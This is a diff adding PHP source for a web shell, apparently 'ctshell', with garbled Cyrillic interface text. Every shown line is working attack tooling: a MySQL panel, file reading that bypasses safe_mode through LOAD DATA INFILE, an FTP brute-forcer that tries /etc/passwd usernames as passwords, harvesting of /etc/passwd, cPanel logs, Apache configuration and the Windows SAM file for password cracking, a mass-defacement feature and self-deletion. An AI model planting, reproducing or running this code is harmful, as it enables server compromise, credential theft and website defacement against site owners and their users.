+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
+<li>Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïğîöåññà. </li>
+<li>Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost </li>
+<li>Åñëè ïîğò ÿâëÿåòñÿ ïóñòûì, ïîğò - 3306 (íåïëàòåæ)</li></td>
+<td  class=td2 width="90%" height="1" valign="top">
+<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
+<td class=td2>&nbsp;<b><font size=2 color=#000000>Çàïîëíèòå ôîğìó:</font></b><table><tr class=tr2><td class=td2>Èìÿ:</td>
+<td  class=td2 align=right>Ïàğîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
+<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
+<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>Õîñò:</td>
+<td class=td2>Ïîğò:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
+<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Ñîåäèíèòåñü"></td></tr><tr>
+<td class=td2></td></tr></form></table></td><?php }
+ else
+ {
+  if (!empty($sql_db))
+  {
+?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_tables($sql_db);
+if (!$result) {echo mysql_error();}
+else
+{
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_dbs($sql_sock);
+if (!$result) {echo mysql_error();}
+else
+{
+ ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ echo "<option value=\"\">Databases (...)</option>
+";
+ $c = 0;
+ while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+}
+?></select><hr size="1" noshade>Ïîæàëóéñòà, âûáåğèòå áàçó äàííûõ<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  if ($sql_db)
+  {
+echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+echo "</b></center>";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtpl")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+ echo "<td><center><b>Table</b></center></td>";
+ echo "<td><b>Rows</b></td>";
+ echo "<td><b>Type</b></td>";
+ echo "<td><b>Created</b></td>";
+ echo "<td><b>Modified</b></td>";
+ echo "<td><b>Size</b></td>";
+ echo "<td><b>Action</b></td>";
+ echo "</tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "<tr>";
+  echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+  echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+  echo "<td>".$row[3]."</td>";
+  echo "<td>".$row[1]."</td>";
+  echo "<td>".$row[10]."</td>";
+  echo "<td>".$row[11]."</td>";
+  echo "<td>".$size."</td>";
+  echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+  echo "</tr>";
+  $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>»</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Ñîçäàéòå íîâûé Áàçó:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Ñîçäàòü"></form></td><td width="30%" height="1"><b>Ïğèñìîòğåòü Ôàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Âçÿòü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+}
+if (!empty($sql_act))
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "<center><b>Server-status variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table></center>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "<center><b>Server variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "<center><b>Ïğîöåññû:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+$f = ""; 
+while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+}
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Èíôîğìàöèÿ áåçîïàñíîñòè ñåğâåğà:</b></center>";
+ echo "<b>Ïğîãğàììíîå îáåñïå÷åíèå:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Áåçîïàñíîñòü: ".$hsafemode."</b><br>";
+ echo "<b>Îòêğûòûé îñíîâíîé äèğåêòîğ: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "<b>*nix /etc/passwd:</b><br>";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."<br>";}
+ $i++;
+}
+  }
+  else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">Âû ìîæåòå âçëîìàòü winnt ïàğîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Ñêà÷àòü</b></u></a>, c èñïîëüçîâàíèå lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Ñàìîóäàëèòü: ".__FILE__." <br>Âû óâåğåííû?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
